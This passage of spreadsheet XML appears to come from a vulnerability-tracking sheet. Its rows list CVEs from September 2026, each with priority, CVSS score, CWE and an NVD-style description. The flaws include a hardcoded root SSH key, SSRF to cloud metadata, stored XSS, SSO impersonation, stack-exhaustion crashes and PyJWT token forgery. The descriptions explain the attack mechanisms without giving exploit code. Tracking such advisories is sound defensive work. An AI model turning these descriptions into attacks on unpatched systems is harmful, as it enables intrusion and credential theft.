      </c>
      <c r="D41" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-1242</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module contains a hardcoded SSH public key in /root/.ssh/authorized_keys, serving as a potential backdoor. The SSH daemon allows root login via key authentication and starts automatically. An attacker with the matching private key can gain a root shell on any affected device, resulting in full system compromise. The key cannot be removed without remounting the file system and survives a factory reset. Vendor notes that this functionality was used only for service purposes.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82928</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101905</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-441</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.15.2 until 1.20.0, the Node HTTP adapter in lib/adapters/http.js supplies request options without an own createConnection value. A separate same-process prototype-pollution flaw places a function on Object.prototype.createConnection. Node resolves and invokes the inherited createConnection socket factory, allowing the attacker-controlled function to select the transport endpoint. The attacker endpoint can receive request headers and bodies, including credentials, and return attacker-controlled responses while the URL appears legitimate. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101905</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55160</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>aws, requests</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>Stringer is a self-hosted, anti-social RSS reader. Prior to commit 75cb095, an unrestricted Server-Side Request Forgery (SSRF) vulnerability allows any authenticated user to force the Stringer server to send arbitrary HTTP/HTTPS requests to internal networks, localhost services, and cloud metadata endpoints (e.g. AWS IMDS 169.254.169.254). When self-service signup is enabled (Setting::UserSignup), even a low-privileged registered user can exploit this to scan internal services or steal cloud IAM credentials. This issue has been patched via commit 75cb095.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55160</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100751</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via data-rlta-url attributes in Tabs &amp; Accordions (Pro) 2.3.0 - 3.1.0 - Tabs &amp; Accordions Pro accepts a url option for an item and writes it to a generated data-rlta-url attribute. The browser code passes that value to window.open() when the item is activated. Affected versions do not reject browser URL schemes which execute JavaScript. Joomla sees ordinary plugin syntax while filtering the authored article; Tabs &amp; Accordions creates the executable browser behavior later while rendering the article.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100751</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101878</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>Bitwarden Server 2025.6.0 before 2026.5.0 declares the @ExternalId parameter of the User_ReadBySsoUserOrganizationIdExternalId stored procedure as NVARCHAR(50) while the column it queries stores NVARCHAR(300), silently truncating the SSO login identifier on SQL Server deployments and allowing a user whose identity-provider identifier begins with another organization member's full 50-character identifier to authenticate as that member and obtain a victim-scoped access token.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101878</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102276</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.19, 2.1.5, 3.0.7, and 5.0.10, crafted brace patterns can exhaust the native stack in parseCommaParts because parseCommaParts recursively processes the remainder once per brace group and uses push.apply to pass every element of a very large comma-part array as a function argument. Patterns containing many comma-separated brace groups trigger the recursive path, while the large array triggers the argument-array path without deep recursion. These paths cause recursive and argument-array native stack exhaustion before max or maxLength can limit output, potentially terminating the Node.js process in a process-terminating denial of service. This issue is fixed in versions 1.1.19, 2.1.5, 3.0.7, and 5.0.10.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102276</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102278</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.20, 2.1.6, 3.0.8, and 5.0.11, deeply nested brace groups cause expand_() to recurse once per nesting level at comma-member and single-set expansion sites, exhausting the native stack before output limits can apply and potentially terminating the Node.js process. expand_ performs uncontrolled recursion for nested brace alternatives and single-part sets. deeply nested brace groups supplied as an untrusted pattern. expand_ is affected. expand is affected. Comma members is affected. Single set is affected. native stack exhaustion during nested sub-expansion. process-terminating denial of service. This issue is fixed in versions 1.1.20, 2.1.6, 3.0.8, and 5.0.11.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102278</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102281</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-674</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Nest is a framework for building scalable Node.js server-side applications. Prior to 11.2.4 and 12.0.2, a single message with a deeply nested object in its pattern can terminate a NestJS microservice using the TCP or RabbitMQ transport. ServerTCP#handleMessage and ServerRMQ#handleMessage pass a client-controlled non-string pattern to JSON.stringify to derive the handler lookup key; sufficiently deep nesting throws RangeError: Maximum call stack size exceeded, and the unhandled promise rejection terminates Node.js under its default behavior. An attacker who can reach the TCP port or publish to the consumed RabbitMQ queue or exchange can crash the service on demand; other transports are not affected because their patterns arrive as strings. This issue is fixed in versions 11.2.4 and 12.0.2.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102281</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101916</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>grpc</t>
        </is>
      </c>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>@grpc/grpc-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to 1.13.6 and 1.14.5, getAuthContext does not distinguish authorized from unauthorized peer certificates when server credentials set requireClientCertificate to false. When applications use the returned authentication context, they can treat an unauthorized certificate as authorized, causing improper authentication. @grpc/grpc-js-xds can reach this condition when RBAC authentication is enabled in affected configurations. This issue is fixed in version 1.14.5 and 1.13.6.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101916</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102266</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr">
        <is>
          <t>python, go, rust</t>
        </is>
      </c>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, HMACAlgorithm.from_jwk is affected because PyJWK verification path used the decoded key without applying prepare_key validation. This occurs when a trusted JWK Set contains an oct entry with an empty k value. As a result, an attacker signs an HMAC token with the same zero-length key accepted by PyJWT. Consequently, forged token can carry arbitrary authenticated claims. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102266</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102267</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>python, rust</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-345, CWE-918</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT PyJWKClient is affected because redirect destinations are not revalidated against the JWKS trust boundary. This occurs when a configured trusted JWKS endpoint returns an attacker-influenced redirect. As a result, PyJWKClient follows the redirect and consumes the redirected response as key material. Consequently, forwarded credentials may be disclosed or verification keys may be substituted. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102267</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102271</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.4.0 until 2.14.0, PyJWT HMACAlgorithm.prepare_key is affected because asymmetric-key guard relies on textual markers that are absent from DER encoding. This occurs when an application mixes HMAC and asymmetric algorithms and supplies a DER public key as the shared verification key. As a result, PyJWT uses public DER bytes as an HMAC secret. Consequently, an attacker who knows the public key can forge authenticated HMAC tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102271</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102272</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, HMACAlgorithm.prepare_key in jwt/algorithms.py is affected because raw-JWK detector does not normalize accepted Unicode byte-order marks before checking for JSON. This occurs when a public JWK is prefixed with a UTF-8 BOM and used in a mixed-algorithm verification path. As a result, public JWK bypasses asymmetric-key detection and becomes the HMAC secret. Consequently, an attacker who knows the public key can forge authenticated tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102272</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102273</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, PyJWT HMACAlgorithm.prepare_key is affected because HMAC key guard only recognizes top-level public JWK forms and misses container representations. This occurs when an application allows HMAC and asymmetric algorithms and passes a public JWK container as the raw key. As a result, public asymmetric key material is accepted as the HMAC secret. Consequently, an attacker who knows the public key can forge a token with arbitrary authenticated claims. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102273</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102334</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>nginx, gin</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
